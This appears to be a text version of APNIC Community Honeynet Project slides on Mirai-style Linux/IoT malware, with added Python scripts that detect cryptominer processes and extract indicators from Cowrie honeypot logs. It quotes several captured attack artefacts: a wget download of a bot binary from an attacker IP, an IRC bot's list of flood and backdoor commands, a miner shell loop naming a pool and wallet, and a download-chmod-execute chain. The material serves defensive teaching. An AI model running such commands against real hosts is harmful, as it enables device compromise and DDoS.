The document discusses observations from the APNIC Community Honeynet Project, including Linux/Unix malware targeting servers and IoT devices, and lessons learned. Some key observations are the prevalence of Linux/Unix malware like Mirai that targets exposed devices with weak credentials. Honeypots captured login attempts and payloads downloaded from command and control servers. Lessons include the need to patch systems, use strong unique credentials, and monitor for infections.
APNIC Community Honeynet Project
• Context
– Educational: using honeypots to understand network security attacks and threats, as part of our network security training
– Situational awareness, the bigger picture, cooperation with other stakeholders, tools (e.g. the MISP threat sharing platform, Wireshark, Suricata, etc.)
• Collaboration
– Partners deploy honeypots, APNIC runs the backend
– Information collected among partners & threat sharing*
• Outcomes
– More than 50 distributed honeypots* in the AP region since 2017
– Share threat information with APNIC members and partners (e.g. CERTs/CSIRTs, network operators)
• https://blog.apnic.net/2020/07/09/apnic-community-honeynet-project-behind-the-scenes/
• https://dash.apnic.net
APNIC Community Honeypot
1. Purpose and Placement
– Research & alerting; placement: Internet-facing
2. Type of Honeypots
– Cowrie, Dionaea, RDPHoney
3. Deployment
– Community Honey Network (fork of Modern Honey Network)
– Partners & self-hosting
4. Data Collection, Analysis & Action
– Logs, visualization, alert, action (incident response)
– Elasticsearch, Kibana, Logstash, Beats
– Suricata IDS
– ElastAlert + Slack
5. Maintenance
– Ansible
– LibreNMS
Figure: Detection with Suricata rulesets
Figure: Slack alert
Linux/Unix Malware
• Routers, IoT devices and servers run Linux/Unix-based operating systems
• Not new, but pervasive
– Targets are exposed on the Internet (HTTP, Telnet, SSH)
– Unpatched / unmonitored (e.g. no anti-virus, firmware upgrades not applied)
– Default/weak credentials
• Popular example – Mirai (DDoS agent)
– Source code was shared publicly
– Many variants – josho, owari, masuta, sora, etc.
– Gafgyt
• Simple techniques for infecting, spreading & persistence
• Interesting scenarios
– Working from home
– Servers / hosting / cloud
Different Perspectives of a DDoS
Figure: the same DDoS seen from three viewpoints – source, target / victim perspective, attacker perspective – each relative to "my network / infrastructure / host"
Service & Attacker Infrastructure
• Setting up the infrastructure
• Misconfigured services
– Servers – NTP, DNS, SSDP, etc.
– Amplification attacks
– Spoofed source of request
– https://stats.cybergreen.net/
– https://www.shadowserver.org/what-we-do/network-reporting/get-reports
• Active bot "recruitment"
– Internet-exposed services
– Vulnerable devices
– Weak credentials
Figure: "Recruitment Process" (attacker → source)
1. Scan and gain access – brute force (Username: admin, password: 12345) or remote code execution via web interface
2. Download binary / execute – wget http://37.x.2x.190:80/13747243572475/hx86_64 – then connect to command and control (C&C)
Telnet/SSH Honeypot (Cowrie)
• Emulates SSH / Telnet
– Allows the attacker to log in
• Emulates a Linux/Unix environment
– Captures commands issued by the attacker after login
– Including downloads
• "Look and feel" of Linux/Unix servers and IoT devices
• Attracts a certain class of attacks
– Scan for SSH/Telnet
– Brute-force username/password
– Login & execute payload(s)
• DDoS agents & cryptominers
– Based on post-login activities and binaries collected
Figure: Mirai sample – 2016
* Non-spoof / non-root attacks: (can run on all bots) *
* STD <ip> <port> <time> = A non spoof UDP HIV STD flooder *
* HOLD <host> <port> <time> = A vanilla TCP connection flooder *
* JUNK <host> <port> <time> = A vanilla TCP flooder (modded) *
* UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder
* HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder
* *
* Spoof / root attacks: *
* DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution
* BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets.
* *
* Bot commands: *
* AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. *
* GETIP <iface> = gets the IP address from an interface *
* FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port)
* RNDNICK = Randomizes knight nickname *
* NICK <nick> = Changes the nick of the client *
* SERVER <server> = Changes servers *
* GETSPOOFS = Gets the current spoofing *
* SPOOFS <subnet> = Changes spoofing to a subnet *
* DISABLE = Disables all packeting from the knight *
* ENABLE = Enables all packeting from the knight *
* KILL = Kills the knight *
* GET <http address> <save as> = Downloads a file off the web *
* VERSION = Requests version of knight *
* KILLALL = Kills all current packeting *
* HELP = Displays this *
* IRC <command> = Sends this command to the server *
* SH <command> = Executes a command *
* BASH <command> = Run a bash command *
* ISH <command> = Interactive SH (via privmsg) *
* SHD <command> = Daemonize command *
* INSTALL <http://server/bin> = Install binary (via wget) *
* BINUPDATE <http://server/bin> = Update a binary (via wget) *
* LOCKUP <http://server/bin> = Kill telnet, install a backdoor! *
* *
Figure: Source code of an IRC-based bot (command help text)
www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o pool.minexmr.com:4444 -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaNR1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86TfdXi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )
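The process line above is the shape a defender wants to catch on a compromised web host: the web-server account running a shell loop that relaunches a binary from a web-writable directory with miner-style arguments. The script below is an added example, not code from the APNIC project. It parses `ps aux` output and scores each process on several independent indicators so that a single noisy match (a busy database, a legitimate shell) does not page anyone. The `ps` lines, pool hostname, paths and wallet string are constructed placeholders.

```python
"""Flag likely cryptominer processes in `ps aux` output.

Added example, not code from the APNIC project. Heuristics follow the process
captured on the slide: a web-server account running a shell loop that launches
a binary from a web-writable directory with miner-style arguments
("-o pool:port -u wallet") and pins a CPU. The ps lines are constructed for
the example; pool name, paths and wallet string are placeholders.
"""
import re

PS_FIXED_COLUMNS = 10  # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME, then COMMAND
WEB_WRITABLE = ("/var/www/", "/tmp/", "/dev/shm/")
POOL_RE = re.compile(r"\b[\w.-]*(?:pool|xmr|mine|stratum)[\w.-]*:\d{4,5}\b", re.I)
MINER_CLI_RE = re.compile(r"\s-o\s+\S+.*\s-u\s+\S+")  # xmrig-style "-o pool -u wallet"

SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 169012 11328 ?        Ss   Mar20   0:03 /sbin/init
www-data  1234  0.0  0.2 194540  8900 ?        S    Mar20   0:00 /usr/sbin/apache2 -k start
www-data 17838  0.0  0.0   4452   636 ?        S    Mar20   0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/html/files/media-icons/xm2sg -l /var/www/html/files/media-icons/out.txt -o pool.example.invalid:4444 -u WALLET_PLACEHOLDER -k ; sleep 1 ; done )'
www-data 17840 98.5  0.4 242112 18400 ?        Sl   Mar20  51:12 /var/www/html/files/media-icons/xm2sg -l /var/www/html/files/media-icons/out.txt -o pool.example.invalid:4444 -u WALLET_PLACEHOLDER -k
postgres  2222  0.3  1.0 300000 40000 ?        Ss   Mar20   1:10 postgres: checkpointer
"""


def parse_ps(text):
    """Split `ps aux` rows into dicts; COMMAND keeps its internal whitespace."""
    procs = []
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, PS_FIXED_COLUMNS)
        if len(parts) <= PS_FIXED_COLUMNS:
            continue
        procs.append({"user": parts[0], "pid": int(parts[1]),
                      "cpu": float(parts[2]), "cmd": parts[PS_FIXED_COLUMNS]})
    return procs


def _runs_binary_from_webdir(cmd):
    """True when a path under a web-writable dir is in command position
    (first token, or right after `do`, `;`, `(`, `&&`), not merely an argument."""
    tokens = cmd.split()
    for i, tok in enumerate(tokens):
        if tok.lstrip("'(").startswith(WEB_WRITABLE):
            if i == 0 or tokens[i - 1] in ("do", ";", "(", "&&", "||", "'("):
                return True
    return False


def miner_indicators(proc):
    """Each indicator is weak alone; the caller requires several to fire."""
    cmd, found = proc["cmd"], []
    if POOL_RE.search(cmd):
        found.append("pool_endpoint")      # host:port naming a mining pool
    if MINER_CLI_RE.search(cmd):
        found.append("miner_cli_shape")    # "-o <pool> ... -u <wallet>"
    if "while true" in cmd:
        found.append("shell_loop")         # relaunch loop for persistence
    if _runs_binary_from_webdir(cmd):
        found.append("webdir_binary")      # executable dropped next to web content
    if proc["user"] == "www-data" and cmd.split()[0] in ("sh", "bash", "/bin/sh", "/bin/bash"):
        found.append("web_user_shell")     # web account should not own shells
    if proc["cpu"] >= 80.0:
        found.append("high_cpu")
    return found


def flag_miners(procs, min_indicators=2):
    """Report processes with at least `min_indicators` independent hits."""
    hits = []
    for p in procs:
        ind = miner_indicators(p)
        if len(ind) >= min_indicators:
            hits.append({"pid": p["pid"], "user": p["user"], "indicators": ind})
    return hits


if __name__ == "__main__":
    for hit in flag_miners(parse_ps(SAMPLE_PS)):
        print(hit)
```

In practice the input would come from `ps aux` on the host (or from an EDR process table); both the shell loop (pid 17838) and the miner it relaunches (pid 17840) are reported, while the web server and database processes score zero.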
Analysis – Interesting indicators
• IP addresses of hosts used for initial access, which run a script to download the binary/malware
– Normally compromised systems
• IP addresses of hosts serving the binary/malware + other artefacts
• IP addresses/domains of command and control
• Binaries, scripts, malware samples, source code (+ hashes)
• SSH keys, webshells, group names, IRC #channels
• Miner-related information
• Correlate with other observations, reports, etc.
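The Cowrie captures described on the "Telnet/SSH Honeypot" slide and the indicators listed here can be pulled straight out of Cowrie's JSON log. The script below is an added example, not code from the APNIC project: it parses a handful of constructed Cowrie events (documentation-range IPs, a placeholder hash and outfile), extracts source IPs, credential pairs, download URLs and the hosts serving the binaries, and applies an ElastAlert-style frequency threshold to report brute-force sources. The event ids and field names are the ones Cowrie writes; the log content is constructed.

```python
"""Indicator extraction from Cowrie JSON logs plus a brute-force frequency check.

Added example; not code from the APNIC honeynet project. Event ids and field
names (cowrie.login.failed, cowrie.login.success, cowrie.command.input,
cowrie.session.file_download, src_ip, username, password, input, url, shasum,
timestamp) are the ones Cowrie writes. The log lines are constructed for this
example: IPs come from documentation ranges, hash and outfile are placeholders.
"""
import json
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","timestamp":"2020-10-16T06:53:38.100000Z","src_ip":"192.0.2.56","session":"a1","username":"root","password":"admin"}
{"eventid":"cowrie.login.failed","timestamp":"2020-10-16T06:53:39.100000Z","src_ip":"192.0.2.56","session":"a1","username":"admin","password":"12345"}
{"eventid":"cowrie.login.failed","timestamp":"2020-10-16T06:53:40.100000Z","src_ip":"192.0.2.56","session":"a1","username":"admin","password":"password"}
{"eventid":"cowrie.login.success","timestamp":"2020-10-16T06:53:41.100000Z","src_ip":"192.0.2.56","session":"a1","username":"admin","password":"admin"}
{"eventid":"cowrie.command.input","timestamp":"2020-10-16T06:53:42.100000Z","src_ip":"192.0.2.56","session":"a1","input":"cd /tmp; wget http://198.51.100.7:80/13747243572475/hx86_64; chmod +x hx86_64; ./hx86_64"}
{"eventid":"cowrie.session.file_download","timestamp":"2020-10-16T06:53:43.100000Z","src_ip":"192.0.2.56","session":"a1","url":"http://198.51.100.7:80/13747243572475/hx86_64","outfile":"/var/lib/cowrie/downloads/PLACEHOLDER","shasum":"PLACEHOLDER_SHA256"}
not json at all -- a corrupted line the parser must survive
{"eventid":"cowrie.login.failed","timestamp":"2020-10-16T07:10:00.000000Z","src_ip":"203.0.113.9","session":"b2","username":"pi","password":"raspberry"}
"""

URL_RE = re.compile(r"https?://[^\s;'\"|&<>]+")  # URLs typed into wget/curl commands


def _ts(value):
    # Cowrie timestamps look like 2020-10-16T06:53:37.404513Z
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%fZ")


def parse_events(text):
    """One JSON object per line; a malformed line is skipped, not fatal."""
    events = []
    for line in text.splitlines():
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def extract_indicators(events):
    """Collect the artefacts the slide lists: credentials tried, hosts used for
    initial access, hosts serving binaries, download URLs and sample hashes."""
    ind = {"source_ips": set(), "credentials": Counter(), "commands": [],
           "download_urls": set(), "download_hosts": set(), "hashes": set()}
    for ev in events:
        eid = ev.get("eventid", "")
        if ev.get("src_ip"):
            ind["source_ips"].add(ev["src_ip"])
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            ind["credentials"][(ev.get("username"), ev.get("password"))] += 1
        elif eid == "cowrie.command.input":
            cmd = ev.get("input", "")
            ind["commands"].append(cmd)
            ind["download_urls"].update(URL_RE.findall(cmd))
        elif eid == "cowrie.session.file_download":
            if ev.get("url"):
                ind["download_urls"].add(ev["url"])
            if ev.get("shasum"):
                ind["hashes"].add(ev["shasum"])
    # the host serving the binary is a separate indicator from the login source
    for url in ind["download_urls"]:
        host = urlparse(url).hostname
        if host:
            ind["download_hosts"].add(host)
    return ind


def bruteforce_sources(events, threshold=3, window=timedelta(minutes=5)):
    """ElastAlert-style frequency rule: report each source IP that fails at
    least `threshold` logins inside any sliding `window`; one report per IP."""
    failures = defaultdict(list)
    for ev in events:
        if ev.get("eventid") == "cowrie.login.failed" and ev.get("src_ip"):
            failures[ev["src_ip"]].append(_ts(ev["timestamp"]))
    flagged = []
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                flagged.append(ip)
                break
    return sorted(flagged)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print(extract_indicators(evs))
    print("brute-force sources:", bruteforce_sources(evs))
```

The hosts in `download_hosts` are the ones worth reporting to their network operators (and correlating with Shadowserver or CyberGreen data), while `source_ips` are usually already-compromised systems; keeping the two separate avoids conflating victims with distribution infrastructure.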
Lessons Learned
• Context: how can we "improve" security?
• Bad practices
– Telnet enabled by default on devices
– Weak or default credentials not removed
– Services not developed securely
– Services not deployed securely (e.g. management interfaces shouldn't be exposed on the Internet)
– No action upon notification ("not our device, it is the customer's")
• Miscreants will exploit the weaknesses & monetize
Figure: Slack alert – source IP, from/to, AbuseIPDB lookup
2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP address: x.z.y.56 src_port: 33903 dest_port: 23 ASN Info: XYZ , 38201 , x.z.y.0/21
Back to the Drawing Board?
• Keeping the Internet safe and secure for _everyone_
• Education
– Users, operators, developers
• Governance
– Incident Response
– Roles and responsibilities
– Accountabilities